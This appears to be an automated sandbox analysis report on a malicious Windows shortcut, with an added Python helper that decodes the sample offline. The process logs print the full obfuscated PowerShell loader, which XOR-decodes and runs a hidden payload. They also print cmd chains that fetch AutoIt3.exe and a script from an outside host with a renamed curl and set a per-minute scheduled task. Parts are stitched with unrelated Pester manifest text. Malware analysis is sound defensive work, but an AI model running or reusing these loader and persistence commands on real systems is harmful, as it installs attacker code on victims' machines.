Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free, 8_2_00007FF7F1DB1D84
Source: GSlLzFnTov.exe.1.dr Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C13D0566 push esi; retf 3_2_00007FF7C13D0567
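The PowerShell loader in the command lines above never names its own file. It enumerates *.lnk in the current directory (falling back to %TEMP%), keeps the one whose size is exactly 0x2233E bytes, opens it, seeks to offset 0x1DA5, reads 0x6C00 bytes, XORs every byte with 0xD8, writes the result under the shortcut's name with the .lnk extension cut off, runs that file, and only then deletes the shortcut (the "File deleted" entry further down). Because the lookup is by size and not by name, renaming the sample, as happened here when it was stored under its hash, does not break it. The script below is an added analysis helper, not code from the report or from the malware: it pulls the four constants out of either form of the command line (cmd.exe with caret escapes, or the powershell.exe child without them) and replays the decoding offline. The fixture built by build_sample_lnk, the placeholder payload and the OBSERVED_CMDLINE excerpt are assumptions made for the example; the report does not show what the decoded file contained, so nothing is claimed about it.

```python
import re
from typing import NamedTuple

# Fragments of the loader command line recorded in this report (cmd.exe form, with
# its caret escapes); the parts between the fragments are elided with "...".
OBSERVED_CMDLINE = (
    "po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){"
    "$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object"
    "{$_.length -eq 0x0002233E}; ... if($zPedYniBfy.length -eq 0){cd $env:TEMP; ... }"
    " ... $CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);"
    "$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00); ... "
    "$fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 ... "
    "remove-item -path $WrKnPBwfdh[1] -force;"
)


class LoaderParams(NamedTuple):
    lnk_size: int  # exact size the loader filters *.lnk on ($_.length -eq 0x...)
    offset: int    # Seek(0x...) offset of the embedded blob
    length: int    # ReadBytes(0x...) length of the blob
    xor_key: int   # single-byte key of the -bxor loop


def parse_loader_params(cmdline: str) -> LoaderParams:
    """Recover the four constants from either the cmd.exe (caret-escaped) or the
    powershell.exe form of the command line. The '-eq 0' of the %TEMP% fallback
    branch is not matched because the size pattern requires a 0x prefix."""
    text = cmdline.replace("^", "")  # cmd.exe drops carets before the child sees them

    def hexval(pattern: str) -> int:
        m = re.search(pattern, text, re.IGNORECASE)
        if m is None:
            raise ValueError(f"loader constant not found: {pattern}")
        return int(m.group(1), 16)

    return LoaderParams(
        lnk_size=hexval(r"\.length\s+-eq\s+(0x[0-9a-f]+)"),
        offset=hexval(r"\.Seek\(\s*(0x[0-9a-f]+)\s*,"),
        length=hexval(r"\.ReadBytes\(\s*(0x[0-9a-f]+)\s*\)"),
        xor_key=hexval(r"-bxor\s+(0x[0-9a-f]+)"),
    )


def extract_payload(lnk_bytes: bytes, params: LoaderParams, strict: bool = True) -> bytes:
    """Replay the loader offline: slice the blob at the recorded offset and undo the
    XOR. With strict=True the input must have exactly the size the loader filters on,
    which is the only way the loader identifies its own shortcut on disk."""
    if strict and len(lnk_bytes) != params.lnk_size:
        raise ValueError(f"size {len(lnk_bytes):#x} differs from loader filter {params.lnk_size:#x}")
    end = params.offset + params.length
    if end > len(lnk_bytes):
        raise ValueError("embedded blob extends past the end of the file")
    return bytes(b ^ params.xor_key for b in lnk_bytes[params.offset:end])


def build_sample_lnk(params: LoaderParams, payload: bytes) -> bytes:
    """Constructed fixture, not a real shortcut: a zero-filled buffer of the filtered
    size with the XOR-encoded payload planted at the loader's offset."""
    if len(payload) > params.length:
        raise ValueError("payload longer than the loader's read length")
    encoded = bytes(b ^ params.xor_key for b in payload.ljust(params.length, b"\x00"))
    buf = bytearray(params.lnk_size)
    buf[0:4] = b"\x4c\x00\x00\x00"  # HeaderSize field of a ShellLink header, cosmetic only
    buf[params.offset:params.offset + params.length] = encoded
    return bytes(buf)


def demo() -> bytes:
    """Round trip on the fixture; the placeholder stands in for the dropped file,
    whose content the report does not show."""
    params = parse_loader_params(OBSERVED_CMDLINE)
    placeholder = b"CONSTRUCTED-PAYLOAD-PLACEHOLDER"
    return extract_payload(build_sample_lnk(params, placeholder), params).rstrip(b"\x00")


if __name__ == "__main__":
    p = parse_loader_params(OBSERVED_CMDLINE)
    print(f"size filter={p.lnk_size:#x} offset={p.offset:#x} length={p.length:#x} key={p.xor_key:#x}")
    print(demo())
```

Against a real sample the call is extract_payload(open(path, "rb").read(), parse_loader_params(cmdline)); strict=False decodes a copy whose size no longer matches the filter, which the loader itself would silently skip. Note that the loader opens the shortcut with FileAccess ReadWrite and FileShare None, so a read-only or already-open copy of the .lnk makes it fail before anything is written.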

Persistence and Installation Behavior

Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe File created: C:\GSlLzFnTov\GSlLzFnTov.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework 
for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework 
for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: c:\users\user\desktop\knfv5ivjev.lnk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3969
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4086
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1522
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\GSlLzFnTov\GSlLzFnTov.exe API coverage: 8.4 %
Source: C:\GSlLzFnTov\GSlLzFnTov.exe API coverage: 8.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596 Thread sleep count: 3969 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600 Thread sleep count: 4086 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780 Thread sleep count: 5279 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep count: 1522 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: GSlLzFnTov.exe, 00000009.00000003.1436313162.000002AD15303000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)
Source: GSlLzFnTov.exe, 00000008.00000003.1414994550.0000024D89B63000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: GSlLzFnTov.exe, 0000000C.00000003.1481445331.000001C4E4524000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
Source: GSlLzFnTov.exe, 0000000E.00000003.1503111107.0000022C409E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DEB8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF7F1DEB8E4
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free, 8_2_00007FF7F1DB1D84
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DEBA8C SetUnhandledExceptionFilter, 8_2_00007FF7F1DEBA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 8_2_00007FF7F1DEAFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF7F1DEAFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E9BA8C SetUnhandledExceptionFilter, 12_2_00007FF700E9BA8C
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E9AFA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_00007FF700E9AFA0
Source: C:\GSlLzFnTov\GSlLzFnTov.exe Code function: 12_2_00007FF700E9B8E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_00007FF700E9B8E4
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h c:\GSlLzFnTov
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey0
Source: C:\Windows\System32\cmd.exe Process created: C:\GSlLzFnTov\GSlLzFnTov.exe GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago&za=honey1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c 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||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
Source: unknown Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c slkrgszrcfgabamfkpxfsspwkahnpssjmxqacjvwqtwlathzcqoatzgzvphekkcknxpbjjczuaozveuruijwerqlsofnbqlfrlxeeepsnnhrmfesurkbbefwgclvepxbqikigqmptriqhxyljotmfjdkfbwbstoyrfacvvjedvhjuqnhcakqwkvfexcfskuzakzcxvpndnhjbtqqnpxsgyzejuyxsemtbghipklglyljbmekhnsckbuclvtbxrvybohvkgzbdrhjnrcwpmodkhhznexuqhjsamgodjabnqyutjpuswmlcsntfjgfifkvhphaipsflnrvjofdocbtwxpiyphubutgeckdcpldefzqasjsdcqfcrzkzybugwcqujsecaazsxoqxzgfcprydmcmezedkpwhajtsaeq00001da5xqwrqffmhfezavxobbfnogpfxyqunyxhungmpxfcwvkmueoffajcywxrbrssqjzjhwfnqjydvdrtvckukjqmoujxpojwfomlwbeyyaqubggueevygyggumtmngwzacygrfvsymuksukhnpuktlrgheqjhsksdqtzhzbzidzvdxnabmyynnhpmrzmomjgbbfcalznmvaqjvblrqgwtmdphenrzqkxtttzqkasmkktkteqpouyeonoypuvximvkcwqbbufpqjhzjepzvbmvlsegebapeudyqhgwponuojpfepokewzgzzzkqjwatrkvejlbwskhosfcczbqmpjhtxyphvefsnyxwtavcmpmkssguwhrggnfgcahkutandpathekygnazxwaeruknnyjztstrrkgrnyhdppltxszumghfabsakmzeebzqksgvfjkypxpbjsruzqnmjnqqsggzwcyopugemepcujrenqqtvgepnnhxbrcxbkckzzpojmgvakrawkbbpperyizanjbwzqalffenbchjykmdwgbrqahnfknqanzzjktkiftqfpanfuqnxwefhkgyhoettqnnahzopavqnmlaavglvz||goto&po^w^e^rs^he^l^l -windowstyle hidden function jogmjclrpk(){$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object{$_.length -eq 0x0002233e};$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;if($zpedynibfy.length -eq 0){cd $env:temp;$zpedynibfy=get-childitem *.lnk;$zpedynibfy=$zpedynibfy^|where-object {$_.length -eq 0x0002233e} ;$njlrqzeaumcxvjarunw=$zpedynibfy;$zpedynibfy=$zpedynibfy^|select-object -expandproperty name;}return @($zpedynibfy, $njlrqzeaumcxvjarunw)};function pxufclqzma(){$djlutzcnrs=jogmjclrpk;$zpedynibfy=$djlutzcnrs[0];$zpedynibfy=$zpedynibfy.substring(0,$zpedynibfy.length-4);return $zpedynibfy};function vzgyldmqaw{$djlutzcnrs=pxufclqzma;$rqzweotxli=jogmjclrpk;$zpedynibfy=$rqzweotxli[0];$cvytsijohd=[system.io.binaryreader]::new([system.io.file]::open($zpedynibfy,[system.io.filemode]::open,[system.io.fileaccess]::readwrite,[system.io.fileshare]::none));try{$cvytsijohd.basestream.seek(0x00001da5,[system.io.seekorigin]::begin);$fkltldjopw=$cvytsijohd.readbytes(0x00006c00);}finally{$cvytsijohd.close()};for($njlrqzeaum=0; $njlrqzeaum -lt $fkltldjopw.count; $njlrqzeaum++) { $fkltldjopw[$njlrqzeaum]=$fkltldjopw[$njlrqzeaum] -bxor 0xd8 };[system.io.file]::writeallbytes($djlutzcnrs,$fkltldjopw);$oeefgawpuh='.\'+$djlutzcnrs;^& $oeefgawpuh;return 'wbpvmjeasc'};$oeefgawpuh=vzgyldmqaw;$wrknpbwfdh=jogmjclrpk;remove-item -path $wrknpbwfdh[1] -force;&mkdir c:\gsllzfntov & attrib +h c:\gsllzfntov & cd /d c:\gsllzfntov & copy c:\windows\system32\curl.exe gsllzfntov.exe & gsllzfntov -k -o autoit3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & gsllzfntov -k -o qwbpjvdmta.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "qwbpjvdmta" /tr "c:\gsllzfntov\autoit3.exe c:\gsllzfntov\qwbpjvdmta.au3"
